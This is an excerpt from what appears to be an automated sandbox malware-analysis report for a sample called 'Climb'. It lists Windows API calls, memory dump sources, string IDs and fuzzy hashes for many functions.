                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Long
                                                                                                                                                                      • String ID: SysTreeView32
                                                                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                                                                      • Opcode ID: 11a7794277965c504b8a19b93211cbcab8c565739cd972ea279136085f4032dc
                                                                                                                                                                      • Instruction ID: 7c9d5418ca55ba8f417961d26f8f2bb252d3498875cbe84766c8cbc75288e11b
                                                                                                                                                                      • Opcode Fuzzy Hash: 11a7794277965c504b8a19b93211cbcab8c565739cd972ea279136085f4032dc
                                                                                                                                                                      • Instruction Fuzzy Hash: CB318371214206AFDB119F78CC45BE67BA9FB54338F204719FE75A22E0D774AC509B50
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00573DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00573AD4,?,?), ref: 00573DD5
                                                                                                                                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00573AD7
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00573AF8
                                                                                                                                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00573B63
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                      • String ID: 255.255.255.255
                                                                                                                                                                      • API String ID: 946324512-2422070025
                                                                                                                                                                      • Opcode ID: 08731f0e98d431fdd32b64b2b84f703050e45cd55a0da8e5c49449e91a67c8d7
                                                                                                                                                                      • Instruction ID: 3a59e161a396447fb6619b4ebdf95360c1515e57022b22b3b9d3e9372b27bfe0
                                                                                                                                                                      • Opcode Fuzzy Hash: 08731f0e98d431fdd32b64b2b84f703050e45cd55a0da8e5c49449e91a67c8d7
                                                                                                                                                                      • Instruction Fuzzy Hash: 6A318F396002029FCB10DF68D586EA97FE0FF55328F24C159E81E8B292D731EE45EB60
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 005849DC
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 005849F0
                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00584A14
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Window
                                                                                                                                                                      • String ID: SysMonthCal32
                                                                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                                                                      • Opcode ID: b32b1341df00dac90d4f136329a143bb405bced43fd0ce12978101d4c2cb04d3
                                                                                                                                                                      • Instruction ID: 599a3f31d7bfaff38158a0956f70efb27014875654add39e96565fbb29c99d7a
                                                                                                                                                                      • Opcode Fuzzy Hash: b32b1341df00dac90d4f136329a143bb405bced43fd0ce12978101d4c2cb04d3
                                                                                                                                                                      • Instruction Fuzzy Hash: F621BF3260021AABDF259F50CC46FEB3BA9FF48728F110214FE157B0D0D6B5A8559BA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 005851A3
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 005851B1
                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 005851B8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                                                                                                      • String ID: msctls_updown32
                                                                                                                                                                      • API String ID: 4014797782-2298589950
                                                                                                                                                                      • Opcode ID: 19b6d7e908e97e4d8bf693f8c3debdba1d915fbe010faaf4b1518ec658cd477a
                                                                                                                                                                      • Instruction ID: 1d3586c0d8bce6780ed84c736182b4b9fd77fb63ae6b0b9361776d2ee27c14b6
                                                                                                                                                                      • Opcode Fuzzy Hash: 19b6d7e908e97e4d8bf693f8c3debdba1d915fbe010faaf4b1518ec658cd477a
                                                                                                                                                                      • Instruction Fuzzy Hash: 472151B5600609AFEB10EF14CC85DB73BADFB99364F040159F900A73A1DA70EC55DBA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 005842DC
                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 005842EC
                                                                                                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00584312
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                                                                      • String ID: Listbox
                                                                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                                                                      • Opcode ID: 5b8d98af970f71bce934ed1d2c5e290f4810815b1b847f03cd1e37a3455eef48
                                                                                                                                                                      • Instruction ID: 8c16719207889d1eefe2d6cccc23b2a4f432b10e0a5dccae4169a3a833ce3de1
                                                                                                                                                                      • Opcode Fuzzy Hash: 5b8d98af970f71bce934ed1d2c5e290f4810815b1b847f03cd1e37a3455eef48
                                                                                                                                                                      • Instruction Fuzzy Hash: B521B332604219BBEF119F94CC85FBF3B6EFB99754F118114FD01AB190CA719C528BA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0056544D
                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 005654A1
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,0058DCD0), ref: 00565515
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                                                                                                      • String ID: %lu
                                                                                                                                                                      • API String ID: 2507767853-685833217
                                                                                                                                                                      • Opcode ID: 2c5018c522cb4acdfa0a28c04a9ef715f06c5f5dac160814991ac1e1700f1df4
                                                                                                                                                                      • Instruction ID: 04be2efe8ed016124fca440e61611e219d2f49826606e3251258acea96068e6e
                                                                                                                                                                      • Opcode Fuzzy Hash: 2c5018c522cb4acdfa0a28c04a9ef715f06c5f5dac160814991ac1e1700f1df4
                                                                                                                                                                      • Instruction Fuzzy Hash: C5317374A00209AFDB10DF54C885EAA7BF8FF45308F144099F909EB262DB75EE45DB61
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetActiveWindow.USER32 ref: 00588339
                                                                                                                                                                      • EnumChildWindows.USER32(?,0058802F,00000000), ref: 005883B0
                                                                                                                                                                        • Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                                                                      • String ID: (\$(\
                                                                                                                                                                      • API String ID: 3814560230-1456765959
                                                                                                                                                                      • Opcode ID: 55aad0d72586b366546479c8db19cd0b9e127c16d3b76bdf497b2d353087f159
                                                                                                                                                                      • Instruction ID: 1164db3ec77c12375ffe800fe7561f3eb6bba049f9a55875efb89c8bcac34777
                                                                                                                                                                      • Opcode Fuzzy Hash: 55aad0d72586b366546479c8db19cd0b9e127c16d3b76bdf497b2d353087f159
                                                                                                                                                                      • Instruction Fuzzy Hash: E2212875200705DFC724EF69D840AA6BBF5FF59760F600A19E879A73A0DF70A844DB60
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00584CED
                                                                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00584D02
                                                                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00584D0F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                                                                      • Opcode ID: 763676e8b368fc6aaf850c3da5ca2e8fa7245ac2deaea79c51e367fd812c3a84
                                                                                                                                                                      • Instruction ID: 7e28f3dbb3bcad0bcb92a01c2196aecedcc78871ecabda3ff4651256d74796ef
                                                                                                                                                                      • Opcode Fuzzy Hash: 763676e8b368fc6aaf850c3da5ca2e8fa7245ac2deaea79c51e367fd812c3a84
                                                                                                                                                                      • Instruction Fuzzy Hash: 0811CE71240249BEEF206E69CC06FAB3BACFB85B69F110518FE51E20A0C671EC519B20
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A
                                                                                                                                                                        • Part of subcall function 005536F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00553712
                                                                                                                                                                        • Part of subcall function 005536F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00553723
                                                                                                                                                                        • Part of subcall function 005536F4: GetCurrentThreadId.KERNEL32 ref: 0055372A
                                                                                                                                                                        • Part of subcall function 005536F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00553731
                                                                                                                                                                      • GetFocus.USER32 ref: 005538C4
                                                                                                                                                                        • Part of subcall function 0055373B: GetParent.USER32(00000000), ref: 00553746
                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0055390F
                                                                                                                                                                      • EnumChildWindows.USER32(?,00553987), ref: 00553937
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                      • String ID: %s%d
                                                                                                                                                                      • API String ID: 1272988791-1110647743
                                                                                                                                                                      • Opcode ID: 84a130646399ee8563053e6c8bb330fa4a3e596d8646a8471433869b084289e7
                                                                                                                                                                      • Instruction ID: ac57848f59bea648ada2299acfcdd3fd02001a734cfadf3dd30a3d780563cc28
                                                                                                                                                                      • Opcode Fuzzy Hash: 84a130646399ee8563053e6c8bb330fa4a3e596d8646a8471433869b084289e7
                                                                                                                                                                      • Instruction Fuzzy Hash: C611D5B16002096BCF11BF748C99AED7FB9BF94384F00406ABD0DAB292DE7059099B30
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004F5A34
                                                                                                                                                                      • DestroyWindow.USER32(?,004F37B8,?,?,?,?,?,004F3709,?,?), ref: 004F5A91
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DeleteDestroyObjectWindow
                                                                                                                                                                      • String ID: <)\$<)\
                                                                                                                                                                      • API String ID: 2587070983-190169285
                                                                                                                                                                      • Opcode ID: 164adc2c035a8c1cbb1d86c7c37f6882bc4eb36d2b34c22f6173ec0b42f532ca
                                                                                                                                                                      • Instruction ID: 11111b46685644aadfb3baa8cfea49bf35fae0668f66e9e4bd3d80a33c1df3a0
                                                                                                                                                                      • Opcode Fuzzy Hash: 164adc2c035a8c1cbb1d86c7c37f6882bc4eb36d2b34c22f6173ec0b42f532ca
                                                                                                                                                                      • Instruction Fuzzy Hash: 8021F930606E09CFDB189B15E894F3537F0BB64715F04915EEA0297360DB389C99EB1A
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00586360
                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0058638D
                                                                                                                                                                      • DrawMenuBar.USER32(?), ref: 0058639C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$InfoItem$Draw
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 3227129158-4108050209
                                                                                                                                                                      • Opcode ID: 83d1df7c21aafe5a7b447e7806c3bd6daa64599d8c8b1614d8895d1e743ec9ca
                                                                                                                                                                      • Instruction ID: 80b37c88d40f3541b688a4463326a780b21b563be6dd31312b7a50738ee04b45
                                                                                                                                                                      • Opcode Fuzzy Hash: 83d1df7c21aafe5a7b447e7806c3bd6daa64599d8c8b1614d8895d1e743ec9ca
                                                                                                                                                                      • Instruction Fuzzy Hash: 90016D71600218AFEB11AF11DC88BEE7FB5FB44351F10849AE949E6190DF708A85EF31
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetForegroundWindow.USER32(?,005C28E0,0058AD55,000000FC,?,00000000,00000000,?), ref: 0058823F
                                                                                                                                                                      • GetFocus.USER32 ref: 00588247
                                                                                                                                                                        • Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0
                                                                                                                                                                        • Part of subcall function 004F2234: GetWindowLongW.USER32(?,000000EB), ref: 004F2242
                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 005882B4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                                                                      • String ID: (\
                                                                                                                                                                      • API String ID: 3601265619-3685820393
                                                                                                                                                                      • Opcode ID: 877e578d8a9f5caf600c07e9d947c8f3be43f58d6522ef17f197ef64039b0eab
                                                                                                                                                                      • Instruction ID: cd1b82fa2ce65d4a0c1e4374c34bf78fb8eed9fef7e6b979ccfcfc0d287a9f11
                                                                                                                                                                      • Opcode Fuzzy Hash: 877e578d8a9f5caf600c07e9d947c8f3be43f58d6522ef17f197ef64039b0eab
                                                                                                                                                                      • Instruction Fuzzy Hash: D4019E35202900CFD324DB68D944A7A37E6FB89324F1802ADE912972A0CF306C4BDB50
                                                                                                                                                                      APIs
                                                                                                                                                                      • DestroyAcceleratorTable.USER32(?), ref: 00588576
                                                                                                                                                                      • CreateAcceleratorTableW.USER32(00000000,?,?,?,0056BE96,00000000,00000000,?,00000001,00000002), ref: 0058858C
                                                                                                                                                                      • GetForegroundWindow.USER32(?,0056BE96,00000000,00000000,?,00000001,00000002), ref: 00588595
                                                                                                                                                                        • Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                                                                                                                      • String ID: (\
                                                                                                                                                                      • API String ID: 986409557-3685820393
                                                                                                                                                                      • Opcode ID: 2fbbf8d9536c495e4d09f41ab16e63a50e184fefd1e37ca60562eadf669c4150
                                                                                                                                                                      • Instruction ID: b96793738d67831f726819eb2487fddb57f3f8b0e3deb7e107f0c5c1c8d5a597
                                                                                                                                                                      • Opcode Fuzzy Hash: 2fbbf8d9536c495e4d09f41ab16e63a50e184fefd1e37ca60562eadf669c4150
                                                                                                                                                                      • Instruction Fuzzy Hash: 92012931601B04EFCB24AF69EC88A653BF1FB24325F50451EF911A62B0DB30A998EB50
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,005C4038,005C407C), ref: 00588C1A
                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00588C2C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                      • String ID: 8@\$|@\
                                                                                                                                                                      • API String ID: 3712363035-340060010
                                                                                                                                                                      • Opcode ID: a8132e64669b17ad3e872917b1f0983dd7221e05a4f0fef56c96c1aa3bff7e9c
                                                                                                                                                                      • Instruction ID: dcf67172755d6fe7fdc523d50ed24b9a44c4f64d18f2bb2cf3bc8bb6ad0fd202
                                                                                                                                                                      • Opcode Fuzzy Hash: a8132e64669b17ad3e872917b1f0983dd7221e05a4f0fef56c96c1aa3bff7e9c
                                                                                                                                                                      • Instruction Fuzzy Hash: 86F030B2681604BEF7106B616C5DFB73EACFB24350F010421BF08F9191DA654C149BB9
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0054E797
                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 0054E7BD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
